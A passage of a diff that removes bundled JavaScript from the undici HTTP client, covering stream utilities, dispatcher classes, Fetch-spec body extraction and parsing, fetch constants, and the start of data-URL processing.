stream.isReadable(body) - : /state: 'readable'/.test(nodeUtil.inspect(body) - ))) -} - -function getSocketInfo (socket) { - return { - localAddress: socket.localAddress, - localPort: socket.localPort, - remoteAddress: socket.remoteAddress, - remotePort: socket.remotePort, - remoteFamily: socket.remoteFamily, - timeout: socket.timeout, - bytesWritten: socket.bytesWritten, - bytesRead: socket.bytesRead - } -} - -async function * convertIterableToBuffer (iterable) { - for await (const chunk of iterable) { - yield Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk) - } -} - -let ReadableStream -function ReadableStreamFrom (iterable) { - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - if (ReadableStream.from) { - return ReadableStream.from(convertIterableToBuffer(iterable)) - } - - let iterator - return new ReadableStream( - { - async start () { - iterator = iterable[Symbol.asyncIterator]() - }, - async pull (controller) { - const { done, value } = await iterator.next() - if (done) { - queueMicrotask(() => { - controller.close() - }) - } else { - const buf = Buffer.isBuffer(value) ? value : Buffer.from(value) - controller.enqueue(new Uint8Array(buf)) - } - return controller.desiredSize > 0 - }, - async cancel (reason) { - await iterator.return() - } - }, - 0 - ) -} - -// The chunk should be a FormData instance and contains -// all the required methods. 
-function isFormDataLike (object) { - return ( - object && - typeof object === 'object' && - typeof object.append === 'function' && - typeof object.delete === 'function' && - typeof object.get === 'function' && - typeof object.getAll === 'function' && - typeof object.has === 'function' && - typeof object.set === 'function' && - object[Symbol.toStringTag] === 'FormData' - ) -} - -function throwIfAborted (signal) { - if (!signal) { return } - if (typeof signal.throwIfAborted === 'function') { - signal.throwIfAborted() - } else { - if (signal.aborted) { - // DOMException not available < v17.0.0 - const err = new Error('The operation was aborted') - err.name = 'AbortError' - throw err - } - } -} - -function addAbortListener (signal, listener) { - if ('addEventListener' in signal) { - signal.addEventListener('abort', listener, { once: true }) - return () => signal.removeEventListener('abort', listener) - } - signal.addListener('abort', listener) - return () => signal.removeListener('abort', listener) -} - -const hasToWellFormed = !!String.prototype.toWellFormed - -/** - * @param {string} val - */ -function toUSVString (val) { - if (hasToWellFormed) { - return `${val}`.toWellFormed() - } else if (nodeUtil.toUSVString) { - return nodeUtil.toUSVString(val) - } - - return `${val}` -} - -// Parsed accordingly to RFC 9110 -// https://www.rfc-editor.org/rfc/rfc9110#field.content-range -function parseRangeHeader (range) { - if (range == null || range === '') return { start: 0, end: null, size: null } - - const m = range ? range.match(/^bytes (\d+)-(\d+)\/(\d+)?$/) : null - return m - ? { - start: parseInt(m[1]), - end: m[2] ? parseInt(m[2]) : null, - size: m[3] ? 
parseInt(m[3]) : null - } - : null -} - -const kEnumerableProperty = Object.create(null) -kEnumerableProperty.enumerable = true - -module.exports = { - kEnumerableProperty, - nop, - isDisturbed, - isErrored, - isReadable, - toUSVString, - isReadableAborted, - isBlobLike, - parseOrigin, - parseURL, - getServerName, - isStream, - isIterable, - isAsyncIterable, - isDestroyed, - parseRawHeaders, - parseHeaders, - parseKeepAliveTimeout, - destroy, - bodyLength, - deepClone, - ReadableStreamFrom, - isBuffer, - validateHandler, - getSocketInfo, - isFormDataLike, - buildURL, - throwIfAborted, - addAbortListener, - parseRangeHeader, - nodeMajor, - nodeMinor, - nodeHasAutoSelectFamily: nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 13), - safeHTTPMethods: ['GET', 'HEAD', 'OPTIONS', 'TRACE'] -} - - -/***/ }), - -/***/ 4839: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Dispatcher = __nccwpck_require__(412) -const { - ClientDestroyedError, - ClientClosedError, - InvalidArgumentError -} = __nccwpck_require__(8045) -const { kDestroy, kClose, kDispatch, kInterceptors } = __nccwpck_require__(2785) - -const kDestroyed = Symbol('destroyed') -const kClosed = Symbol('closed') -const kOnDestroyed = Symbol('onDestroyed') -const kOnClosed = Symbol('onClosed') -const kInterceptedDispatch = Symbol('Intercepted Dispatch') - -class DispatcherBase extends Dispatcher { - constructor () { - super() - - this[kDestroyed] = false - this[kOnDestroyed] = null - this[kClosed] = false - this[kOnClosed] = [] - } - - get destroyed () { - return this[kDestroyed] - } - - get closed () { - return this[kClosed] - } - - get interceptors () { - return this[kInterceptors] - } - - set interceptors (newInterceptors) { - if (newInterceptors) { - for (let i = newInterceptors.length - 1; i >= 0; i--) { - const interceptor = this[kInterceptors][i] - if (typeof interceptor !== 'function') { - throw new InvalidArgumentError('interceptor must be an function') - } 
- } - } - - this[kInterceptors] = newInterceptors - } - - close (callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - this.close((err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (this[kDestroyed]) { - queueMicrotask(() => callback(new ClientDestroyedError(), null)) - return - } - - if (this[kClosed]) { - if (this[kOnClosed]) { - this[kOnClosed].push(callback) - } else { - queueMicrotask(() => callback(null, null)) - } - return - } - - this[kClosed] = true - this[kOnClosed].push(callback) - - const onClosed = () => { - const callbacks = this[kOnClosed] - this[kOnClosed] = null - for (let i = 0; i < callbacks.length; i++) { - callbacks[i](null, null) - } - } - - // Should not error. - this[kClose]() - .then(() => this.destroy()) - .then(() => { - queueMicrotask(onClosed) - }) - } - - destroy (err, callback) { - if (typeof err === 'function') { - callback = err - err = null - } - - if (callback === undefined) { - return new Promise((resolve, reject) => { - this.destroy(err, (err, data) => { - return err ? /* istanbul ignore next: should never error */ reject(err) : resolve(data) - }) - }) - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (this[kDestroyed]) { - if (this[kOnDestroyed]) { - this[kOnDestroyed].push(callback) - } else { - queueMicrotask(() => callback(null, null)) - } - return - } - - if (!err) { - err = new ClientDestroyedError() - } - - this[kDestroyed] = true - this[kOnDestroyed] = this[kOnDestroyed] || [] - this[kOnDestroyed].push(callback) - - const onDestroyed = () => { - const callbacks = this[kOnDestroyed] - this[kOnDestroyed] = null - for (let i = 0; i < callbacks.length; i++) { - callbacks[i](null, null) - } - } - - // Should not error. 
- this[kDestroy](err).then(() => { - queueMicrotask(onDestroyed) - }) - } - - [kInterceptedDispatch] (opts, handler) { - if (!this[kInterceptors] || this[kInterceptors].length === 0) { - this[kInterceptedDispatch] = this[kDispatch] - return this[kDispatch](opts, handler) - } - - let dispatch = this[kDispatch].bind(this) - for (let i = this[kInterceptors].length - 1; i >= 0; i--) { - dispatch = this[kInterceptors][i](dispatch) - } - this[kInterceptedDispatch] = dispatch - return dispatch(opts, handler) - } - - dispatch (opts, handler) { - if (!handler || typeof handler !== 'object') { - throw new InvalidArgumentError('handler must be an object') - } - - try { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('opts must be an object.') - } - - if (this[kDestroyed] || this[kOnDestroyed]) { - throw new ClientDestroyedError() - } - - if (this[kClosed]) { - throw new ClientClosedError() - } - - return this[kInterceptedDispatch](opts, handler) - } catch (err) { - if (typeof handler.onError !== 'function') { - throw new InvalidArgumentError('invalid onError method') - } - - handler.onError(err) - - return false - } - } -} - -module.exports = DispatcherBase - - -/***/ }), - -/***/ 412: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const EventEmitter = __nccwpck_require__(2361) - -class Dispatcher extends EventEmitter { - dispatch () { - throw new Error('not implemented') - } - - close () { - throw new Error('not implemented') - } - - destroy () { - throw new Error('not implemented') - } -} - -module.exports = Dispatcher - - -/***/ }), - -/***/ 1472: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Busboy = __nccwpck_require__(727) -const util = __nccwpck_require__(3983) -const { - ReadableStreamFrom, - isBlobLike, - isReadableStreamLike, - readableStreamClose, - createDeferredPromise, - fullyReadBody -} = __nccwpck_require__(2538) -const { FormData } = 
__nccwpck_require__(2015) -const { kState } = __nccwpck_require__(5861) -const { webidl } = __nccwpck_require__(1744) -const { DOMException, structuredClone } = __nccwpck_require__(1037) -const { Blob, File: NativeFile } = __nccwpck_require__(4300) -const { kBodyUsed } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { isErrored } = __nccwpck_require__(3983) -const { isUint8Array, isArrayBuffer } = __nccwpck_require__(9830) -const { File: UndiciFile } = __nccwpck_require__(8511) -const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) - -let ReadableStream = globalThis.ReadableStream - -/** @type {globalThis['File']} */ -const File = NativeFile ?? UndiciFile -const textEncoder = new TextEncoder() -const textDecoder = new TextDecoder() - -// https://fetch.spec.whatwg.org/#concept-bodyinit-extract -function extractBody (object, keepalive = false) { - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - // 1. Let stream be null. - let stream = null - - // 2. If object is a ReadableStream object, then set stream to object. - if (object instanceof ReadableStream) { - stream = object - } else if (isBlobLike(object)) { - // 3. Otherwise, if object is a Blob object, set stream to the - // result of running object’s get stream. - stream = object.stream() - } else { - // 4. Otherwise, set stream to a new ReadableStream object, and set - // up stream. - stream = new ReadableStream({ - async pull (controller) { - controller.enqueue( - typeof source === 'string' ? textEncoder.encode(source) : source - ) - queueMicrotask(() => readableStreamClose(controller)) - }, - start () {}, - type: undefined - }) - } - - // 5. Assert: stream is a ReadableStream object. - assert(isReadableStreamLike(stream)) - - // 6. Let action be null. - let action = null - - // 7. Let source be null. - let source = null - - // 8. Let length be null. - let length = null - - // 9. Let type be null. 
- let type = null - - // 10. Switch on object: - if (typeof object === 'string') { - // Set source to the UTF-8 encoding of object. - // Note: setting source to a Uint8Array here breaks some mocking assumptions. - source = object - - // Set type to `text/plain;charset=UTF-8`. - type = 'text/plain;charset=UTF-8' - } else if (object instanceof URLSearchParams) { - // URLSearchParams - - // spec says to run application/x-www-form-urlencoded on body.list - // this is implemented in Node.js as apart of an URLSearchParams instance toString method - // See: https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L490 - // and https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L1100 - - // Set source to the result of running the application/x-www-form-urlencoded serializer with object’s list. - source = object.toString() - - // Set type to `application/x-www-form-urlencoded;charset=UTF-8`. - type = 'application/x-www-form-urlencoded;charset=UTF-8' - } else if (isArrayBuffer(object)) { - // BufferSource/ArrayBuffer - - // Set source to a copy of the bytes held by object. - source = new Uint8Array(object.slice()) - } else if (ArrayBuffer.isView(object)) { - // BufferSource/ArrayBufferView - - // Set source to a copy of the bytes held by object. - source = new Uint8Array(object.buffer.slice(object.byteOffset, object.byteOffset + object.byteLength)) - } else if (util.isFormDataLike(object)) { - const boundary = `----formdata-undici-0${`${Math.floor(Math.random() * 1e11)}`.padStart(11, '0')}` - const prefix = `--${boundary}\r\nContent-Disposition: form-data` - - /*! formdata-polyfill. MIT License. 
Jimmy Wärting */ - const escape = (str) => - str.replace(/\n/g, '%0A').replace(/\r/g, '%0D').replace(/"/g, '%22') - const normalizeLinefeeds = (value) => value.replace(/\r?\n|\r/g, '\r\n') - - // Set action to this step: run the multipart/form-data - // encoding algorithm, with object’s entry list and UTF-8. - // - This ensures that the body is immutable and can't be changed afterwords - // - That the content-length is calculated in advance. - // - And that all parts are pre-encoded and ready to be sent. - - const blobParts = [] - const rn = new Uint8Array([13, 10]) // '\r\n' - length = 0 - let hasUnknownSizeValue = false - - for (const [name, value] of object) { - if (typeof value === 'string') { - const chunk = textEncoder.encode(prefix + - `; name="${escape(normalizeLinefeeds(name))}"` + - `\r\n\r\n${normalizeLinefeeds(value)}\r\n`) - blobParts.push(chunk) - length += chunk.byteLength - } else { - const chunk = textEncoder.encode(`${prefix}; name="${escape(normalizeLinefeeds(name))}"` + - (value.name ? `; filename="${escape(value.name)}"` : '') + '\r\n' + - `Content-Type: ${ - value.type || 'application/octet-stream' - }\r\n\r\n`) - blobParts.push(chunk, value, rn) - if (typeof value.size === 'number') { - length += chunk.byteLength + value.size + rn.byteLength - } else { - hasUnknownSizeValue = true - } - } - } - - const chunk = textEncoder.encode(`--${boundary}--`) - blobParts.push(chunk) - length += chunk.byteLength - if (hasUnknownSizeValue) { - length = null - } - - // Set source to object. - source = object - - action = async function * () { - for (const part of blobParts) { - if (part.stream) { - yield * part.stream() - } else { - yield part - } - } - } - - // Set type to `multipart/form-data; boundary=`, - // followed by the multipart/form-data boundary string generated - // by the multipart/form-data encoding algorithm. - type = 'multipart/form-data; boundary=' + boundary - } else if (isBlobLike(object)) { - // Blob - - // Set source to object. 
- source = object - - // Set length to object’s size. - length = object.size - - // If object’s type attribute is not the empty byte sequence, set - // type to its value. - if (object.type) { - type = object.type - } - } else if (typeof object[Symbol.asyncIterator] === 'function') { - // If keepalive is true, then throw a TypeError. - if (keepalive) { - throw new TypeError('keepalive') - } - - // If object is disturbed or locked, then throw a TypeError. - if (util.isDisturbed(object) || object.locked) { - throw new TypeError( - 'Response body object should not be disturbed or locked' - ) - } - - stream = - object instanceof ReadableStream ? object : ReadableStreamFrom(object) - } - - // 11. If source is a byte sequence, then set action to a - // step that returns source and length to source’s length. - if (typeof source === 'string' || util.isBuffer(source)) { - length = Buffer.byteLength(source) - } - - // 12. If action is non-null, then run these steps in in parallel: - if (action != null) { - // Run action. - let iterator - stream = new ReadableStream({ - async start () { - iterator = action(object)[Symbol.asyncIterator]() - }, - async pull (controller) { - const { value, done } = await iterator.next() - if (done) { - // When running action is done, close stream. - queueMicrotask(() => { - controller.close() - }) - } else { - // Whenever one or more bytes are available and stream is not errored, - // enqueue a Uint8Array wrapping an ArrayBuffer containing the available - // bytes into stream. - if (!isErrored(stream)) { - controller.enqueue(new Uint8Array(value)) - } - } - return controller.desiredSize > 0 - }, - async cancel (reason) { - await iterator.return() - }, - type: undefined - }) - } - - // 13. Let body be a body whose stream is stream, source is source, - // and length is length. - const body = { stream, source, length } - - // 14. Return (body, type). 
- return [body, type] -} - -// https://fetch.spec.whatwg.org/#bodyinit-safely-extract -function safelyExtractBody (object, keepalive = false) { - if (!ReadableStream) { - // istanbul ignore next - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - // To safely extract a body and a `Content-Type` value from - // a byte sequence or BodyInit object object, run these steps: - - // 1. If object is a ReadableStream object, then: - if (object instanceof ReadableStream) { - // Assert: object is neither disturbed nor locked. - // istanbul ignore next - assert(!util.isDisturbed(object), 'The body has already been consumed.') - // istanbul ignore next - assert(!object.locked, 'The stream is locked.') - } - - // 2. Return the results of extracting object. - return extractBody(object, keepalive) -} - -function cloneBody (body) { - // To clone a body body, run these steps: - - // https://fetch.spec.whatwg.org/#concept-body-clone - - // 1. Let « out1, out2 » be the result of teeing body’s stream. - const [out1, out2] = body.stream.tee() - const out2Clone = structuredClone(out2, { transfer: [out2] }) - // This, for whatever reasons, unrefs out2Clone which allows - // the process to exit by itself. - const [, finalClone] = out2Clone.tee() - - // 2. Set body’s stream to out1. - body.stream = out1 - - // 3. Return a body whose stream is out2 and other members are copied from body. - return { - stream: finalClone, - length: body.length, - source: body.source - } -} - -async function * consumeBody (body) { - if (body) { - if (isUint8Array(body)) { - yield body - } else { - const stream = body.stream - - if (util.isDisturbed(stream)) { - throw new TypeError('The body has already been consumed.') - } - - if (stream.locked) { - throw new TypeError('The stream is locked.') - } - - // Compat. 
- stream[kBodyUsed] = true - - yield * stream - } - } -} - -function throwIfAborted (state) { - if (state.aborted) { - throw new DOMException('The operation was aborted.', 'AbortError') - } -} - -function bodyMixinMethods (instance) { - const methods = { - blob () { - // The blob() method steps are to return the result of - // running consume body with this and the following step - // given a byte sequence bytes: return a Blob whose - // contents are bytes and whose type attribute is this’s - // MIME type. - return specConsumeBody(this, (bytes) => { - let mimeType = bodyMimeType(this) - - if (mimeType === 'failure') { - mimeType = '' - } else if (mimeType) { - mimeType = serializeAMimeType(mimeType) - } - - // Return a Blob whose contents are bytes and type attribute - // is mimeType. - return new Blob([bytes], { type: mimeType }) - }, instance) - }, - - arrayBuffer () { - // The arrayBuffer() method steps are to return the result - // of running consume body with this and the following step - // given a byte sequence bytes: return a new ArrayBuffer - // whose contents are bytes. - return specConsumeBody(this, (bytes) => { - return new Uint8Array(bytes).buffer - }, instance) - }, - - text () { - // The text() method steps are to return the result of running - // consume body with this and UTF-8 decode. - return specConsumeBody(this, utf8DecodeBytes, instance) - }, - - json () { - // The json() method steps are to return the result of running - // consume body with this and parse JSON from bytes. 
- return specConsumeBody(this, parseJSONFromBytes, instance) - }, - - async formData () { - webidl.brandCheck(this, instance) - - throwIfAborted(this[kState]) - - const contentType = this.headers.get('Content-Type') - - // If mimeType’s essence is "multipart/form-data", then: - if (/multipart\/form-data/.test(contentType)) { - const headers = {} - for (const [key, value] of this.headers) headers[key.toLowerCase()] = value - - const responseFormData = new FormData() - - let busboy - - try { - busboy = new Busboy({ - headers, - preservePath: true - }) - } catch (err) { - throw new DOMException(`${err}`, 'AbortError') - } - - busboy.on('field', (name, value) => { - responseFormData.append(name, value) - }) - busboy.on('file', (name, value, filename, encoding, mimeType) => { - const chunks = [] - - if (encoding === 'base64' || encoding.toLowerCase() === 'base64') { - let base64chunk = '' - - value.on('data', (chunk) => { - base64chunk += chunk.toString().replace(/[\r\n]/gm, '') - - const end = base64chunk.length - base64chunk.length % 4 - chunks.push(Buffer.from(base64chunk.slice(0, end), 'base64')) - - base64chunk = base64chunk.slice(end) - }) - value.on('end', () => { - chunks.push(Buffer.from(base64chunk, 'base64')) - responseFormData.append(name, new File(chunks, filename, { type: mimeType })) - }) - } else { - value.on('data', (chunk) => { - chunks.push(chunk) - }) - value.on('end', () => { - responseFormData.append(name, new File(chunks, filename, { type: mimeType })) - }) - } - }) - - const busboyResolve = new Promise((resolve, reject) => { - busboy.on('finish', resolve) - busboy.on('error', (err) => reject(new TypeError(err))) - }) - - if (this.body !== null) for await (const chunk of consumeBody(this[kState].body)) busboy.write(chunk) - busboy.end() - await busboyResolve - - return responseFormData - } else if (/application\/x-www-form-urlencoded/.test(contentType)) { - // Otherwise, if mimeType’s essence is "application/x-www-form-urlencoded", then: - - // 1. 
Let entries be the result of parsing bytes. - let entries - try { - let text = '' - // application/x-www-form-urlencoded parser will keep the BOM. - // https://url.spec.whatwg.org/#concept-urlencoded-parser - // Note that streaming decoder is stateful and cannot be reused - const streamingDecoder = new TextDecoder('utf-8', { ignoreBOM: true }) - - for await (const chunk of consumeBody(this[kState].body)) { - if (!isUint8Array(chunk)) { - throw new TypeError('Expected Uint8Array chunk') - } - text += streamingDecoder.decode(chunk, { stream: true }) - } - text += streamingDecoder.decode() - entries = new URLSearchParams(text) - } catch (err) { - // istanbul ignore next: Unclear when new URLSearchParams can fail on a string. - // 2. If entries is failure, then throw a TypeError. - throw Object.assign(new TypeError(), { cause: err }) - } - - // 3. Return a new FormData object whose entries are entries. - const formData = new FormData() - for (const [name, value] of entries) { - formData.append(name, value) - } - return formData - } else { - // Wait a tick before checking if the request has been aborted. - // Otherwise, a TypeError can be thrown when an AbortError should. - await Promise.resolve() - - throwIfAborted(this[kState]) - - // Otherwise, throw a TypeError. - throw webidl.errors.exception({ - header: `${instance.name}.formData`, - message: 'Could not parse content as FormData.' - }) - } - } - } - - return methods -} - -function mixinBody (prototype) { - Object.assign(prototype.prototype, bodyMixinMethods(prototype)) -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-body-consume-body - * @param {Response|Request} object - * @param {(value: unknown) => unknown} convertBytesToJSValue - * @param {Response|Request} instance - */ -async function specConsumeBody (object, convertBytesToJSValue, instance) { - webidl.brandCheck(object, instance) - - throwIfAborted(object[kState]) - - // 1. 
If object is unusable, then return a promise rejected - // with a TypeError. - if (bodyUnusable(object[kState].body)) { - throw new TypeError('Body is unusable') - } - - // 2. Let promise be a new promise. - const promise = createDeferredPromise() - - // 3. Let errorSteps given error be to reject promise with error. - const errorSteps = (error) => promise.reject(error) - - // 4. Let successSteps given a byte sequence data be to resolve - // promise with the result of running convertBytesToJSValue - // with data. If that threw an exception, then run errorSteps - // with that exception. - const successSteps = (data) => { - try { - promise.resolve(convertBytesToJSValue(data)) - } catch (e) { - errorSteps(e) - } - } - - // 5. If object’s body is null, then run successSteps with an - // empty byte sequence. - if (object[kState].body == null) { - successSteps(new Uint8Array()) - return promise.promise - } - - // 6. Otherwise, fully read object’s body given successSteps, - // errorSteps, and object’s relevant global object. - await fullyReadBody(object[kState].body, successSteps, errorSteps) - - // 7. Return promise. - return promise.promise -} - -// https://fetch.spec.whatwg.org/#body-unusable -function bodyUnusable (body) { - // An object including the Body interface mixin is - // said to be unusable if its body is non-null and - // its body’s stream is disturbed or locked. - return body != null && (body.stream.locked || util.isDisturbed(body.stream)) -} - -/** - * @see https://encoding.spec.whatwg.org/#utf-8-decode - * @param {Buffer} buffer - */ -function utf8DecodeBytes (buffer) { - if (buffer.length === 0) { - return '' - } - - // 1. Let buffer be the result of peeking three bytes from - // ioQueue, converted to a byte sequence. - - // 2. If buffer is 0xEF 0xBB 0xBF, then read three - // bytes from ioQueue. (Do nothing with those bytes.) - if (buffer[0] === 0xEF && buffer[1] === 0xBB && buffer[2] === 0xBF) { - buffer = buffer.subarray(3) - } - - // 3. 
Process a queue with an instance of UTF-8’s - // decoder, ioQueue, output, and "replacement". - const output = textDecoder.decode(buffer) - - // 4. Return output. - return output -} - -/** - * @see https://infra.spec.whatwg.org/#parse-json-bytes-to-a-javascript-value - * @param {Uint8Array} bytes - */ -function parseJSONFromBytes (bytes) { - return JSON.parse(utf8DecodeBytes(bytes)) -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-body-mime-type - * @param {import('./response').Response|import('./request').Request} object - */ -function bodyMimeType (object) { - const { headersList } = object[kState] - const contentType = headersList.get('content-type') - - if (contentType === null) { - return 'failure' - } - - return parseMIMEType(contentType) -} - -module.exports = { - extractBody, - safelyExtractBody, - cloneBody, - mixinBody -} - - -/***/ }), - -/***/ 1037: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { MessageChannel, receiveMessageOnPort } = __nccwpck_require__(1267) - -const corsSafeListedMethods = ['GET', 'HEAD', 'POST'] -const corsSafeListedMethodsSet = new Set(corsSafeListedMethods) - -const nullBodyStatus = [101, 204, 205, 304] - -const redirectStatus = [301, 302, 303, 307, 308] -const redirectStatusSet = new Set(redirectStatus) - -// https://fetch.spec.whatwg.org/#block-bad-port -const badPorts = [ - '1', '7', '9', '11', '13', '15', '17', '19', '20', '21', '22', '23', '25', '37', '42', '43', '53', '69', '77', '79', - '87', '95', '101', '102', '103', '104', '109', '110', '111', '113', '115', '117', '119', '123', '135', '137', - '139', '143', '161', '179', '389', '427', '465', '512', '513', '514', '515', '526', '530', '531', '532', - '540', '548', '554', '556', '563', '587', '601', '636', '989', '990', '993', '995', '1719', '1720', '1723', - '2049', '3659', '4045', '5060', '5061', '6000', '6566', '6665', '6666', '6667', '6668', '6669', '6697', - '10080' -] - -const badPortsSet = new 
Set(badPorts) - -// https://w3c.github.io/webappsec-referrer-policy/#referrer-policies -const referrerPolicy = [ - '', - 'no-referrer', - 'no-referrer-when-downgrade', - 'same-origin', - 'origin', - 'strict-origin', - 'origin-when-cross-origin', - 'strict-origin-when-cross-origin', - 'unsafe-url' -] -const referrerPolicySet = new Set(referrerPolicy) - -const requestRedirect = ['follow', 'manual', 'error'] - -const safeMethods = ['GET', 'HEAD', 'OPTIONS', 'TRACE'] -const safeMethodsSet = new Set(safeMethods) - -const requestMode = ['navigate', 'same-origin', 'no-cors', 'cors'] - -const requestCredentials = ['omit', 'same-origin', 'include'] - -const requestCache = [ - 'default', - 'no-store', - 'reload', - 'no-cache', - 'force-cache', - 'only-if-cached' -] - -// https://fetch.spec.whatwg.org/#request-body-header-name -const requestBodyHeader = [ - 'content-encoding', - 'content-language', - 'content-location', - 'content-type', - // See https://github.com/nodejs/undici/issues/2021 - // 'Content-Length' is a forbidden header name, which is typically - // removed in the Headers implementation. However, undici doesn't - // filter out headers, so we add it here. - 'content-length' -] - -// https://fetch.spec.whatwg.org/#enumdef-requestduplex -const requestDuplex = [ - 'half' -] - -// http://fetch.spec.whatwg.org/#forbidden-method -const forbiddenMethods = ['CONNECT', 'TRACE', 'TRACK'] -const forbiddenMethodsSet = new Set(forbiddenMethods) - -const subresource = [ - 'audio', - 'audioworklet', - 'font', - 'image', - 'manifest', - 'paintworklet', - 'script', - 'style', - 'track', - 'video', - 'xslt', - '' -] -const subresourceSet = new Set(subresource) - -/** @type {globalThis['DOMException']} */ -const DOMException = globalThis.DOMException ?? (() => { - // DOMException was only made a global in Node v17.0.0, - // but fetch supports >= v16.8. 
- try { - atob('~') - } catch (err) { - return Object.getPrototypeOf(err).constructor - } -})() - -let channel - -/** @type {globalThis['structuredClone']} */ -const structuredClone = - globalThis.structuredClone ?? - // https://github.com/nodejs/node/blob/b27ae24dcc4251bad726d9d84baf678d1f707fed/lib/internal/structured_clone.js - // structuredClone was added in v17.0.0, but fetch supports v16.8 - function structuredClone (value, options = undefined) { - if (arguments.length === 0) { - throw new TypeError('missing argument') - } - - if (!channel) { - channel = new MessageChannel() - } - channel.port1.unref() - channel.port2.unref() - channel.port1.postMessage(value, options?.transfer) - return receiveMessageOnPort(channel.port2).message - } - -module.exports = { - DOMException, - structuredClone, - subresource, - forbiddenMethods, - requestBodyHeader, - referrerPolicy, - requestRedirect, - requestMode, - requestCredentials, - requestCache, - redirectStatus, - corsSafeListedMethods, - nullBodyStatus, - safeMethods, - badPorts, - requestDuplex, - subresourceSet, - badPortsSet, - redirectStatusSet, - corsSafeListedMethodsSet, - safeMethodsSet, - forbiddenMethodsSet, - referrerPolicySet -} - - -/***/ }), - -/***/ 685: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const assert = __nccwpck_require__(9491) -const { atob } = __nccwpck_require__(4300) -const { isomorphicDecode } = __nccwpck_require__(2538) - -const encoder = new TextEncoder() - -/** - * @see https://mimesniff.spec.whatwg.org/#http-token-code-point - */ -const HTTP_TOKEN_CODEPOINTS = /^[!#$%&'*+-.^_|~A-Za-z0-9]+$/ -const HTTP_WHITESPACE_REGEX = /(\u000A|\u000D|\u0009|\u0020)/ // eslint-disable-line -/** - * @see https://mimesniff.spec.whatwg.org/#http-quoted-string-token-code-point - */ -const HTTP_QUOTED_STRING_TOKENS = /[\u0009|\u0020-\u007E|\u0080-\u00FF]/ // eslint-disable-line - -// https://fetch.spec.whatwg.org/#data-url-processor -/** @param {URL} dataURL */ -function 
dataURLProcessor (dataURL) { - // 1. Assert: dataURL’s scheme is "data". - assert(dataURL.protocol === 'data:') - - // 2. Let input be the result of running the URL - // serializer on dataURL with exclude fragment - // set to true. - let input = URLSerializer(dataURL, true) - - // 3. Remove the leading "data:" string from input. - input = input.slice(5) - - // 4. Let position point at the start of input. - const position = { position: 0 } - - // 5. Let mimeType be the result of collecting a - // sequence of code points that are not equal - // to U+002C (,), given position. - let mimeType = collectASequenceOfCodePointsFast( - ',', - input, - position - ) - - // 6. Strip leading and trailing ASCII whitespace - // from mimeType. - // Undici implementation note: we need to store the - // length because if the mimetype has spaces removed, - // the wrong amount will be sliced from the input in - // step #9 - const mimeTypeLength = mimeType.length - mimeType = removeASCIIWhitespace(mimeType, true, true) - - // 7. If position is past the end of input, then - // return failure - if (position.position >= input.length) { - return 'failure' - } - - // 8. Advance position by 1. - position.position++ - - // 9. Let encodedBody be the remainder of input. - const encodedBody = input.slice(mimeTypeLength + 1) - - // 10. Let body be the percent-decoding of encodedBody. - let body = stringPercentDecode(encodedBody) - - // 11. If mimeType ends with U+003B (;), followed by - // zero or more U+0020 SPACE, followed by an ASCII - // case-insensitive match for "base64", then: - if (/;(\u0020){0,}base64$/i.test(mimeType)) { - // 1. Let stringBody be the isomorphic decode of body. - const stringBody = isomorphicDecode(body) - - // 2. Set body to the forgiving-base64 decode of - // stringBody. - body = forgivingBase64(stringBody) - - // 3. If body is failure, then return failure. - if (body === 'failure') { - return 'failure' - } - - // 4. Remove the last 6 code points from mimeType. 
- mimeType = mimeType.slice(0, -6) - - // 5. Remove trailing U+0020 SPACE code points from mimeType, - // if any. - mimeType = mimeType.replace(/(\u0020)+$/, '') - - // 6. Remove the last U+003B (;) code point from mimeType. - mimeType = mimeType.slice(0, -1) - } - - // 12. If mimeType starts with U+003B (;), then prepend - // "text/plain" to mimeType. - if (mimeType.startsWith(';')) { - mimeType = 'text/plain' + mimeType - } - - // 13. Let mimeTypeRecord be the result of parsing - // mimeType. - let mimeTypeRecord = parseMIMEType(mimeType) - - // 14. If mimeTypeRecord is failure, then set - // mimeTypeRecord to text/plain;charset=US-ASCII. - if (mimeTypeRecord === 'failure') { - mimeTypeRecord = parseMIMEType('text/plain;charset=US-ASCII') - } - - // 15. Return a new data: URL struct whose MIME - // type is mimeTypeRecord and body is body. - // https://fetch.spec.whatwg.org/#data-url-struct - return { mimeType: mimeTypeRecord, body } -} - -// https://url.spec.whatwg.org/#concept-url-serializer -/** - * @param {URL} url - * @param {boolean} excludeFragment - */ -function URLSerializer (url, excludeFragment = false) { - if (!excludeFragment) { - return url.href - } - - const href = url.href - const hashLength = url.hash.length - - return hashLength === 0 ? href : href.substring(0, href.length - hashLength) -} - -// https://infra.spec.whatwg.org/#collect-a-sequence-of-code-points -/** - * @param {(char: string) => boolean} condition - * @param {string} input - * @param {{ position: number }} position - */ -function collectASequenceOfCodePoints (condition, input, position) { - // 1. Let result be the empty string. - let result = '' - - // 2. While position doesn’t point past the end of input and the - // code point at position within input meets the condition condition: - while (position.position < input.length && condition(input[position.position])) { - // 1. Append that code point to the end of result. - result += input[position.position] - - // 2. 
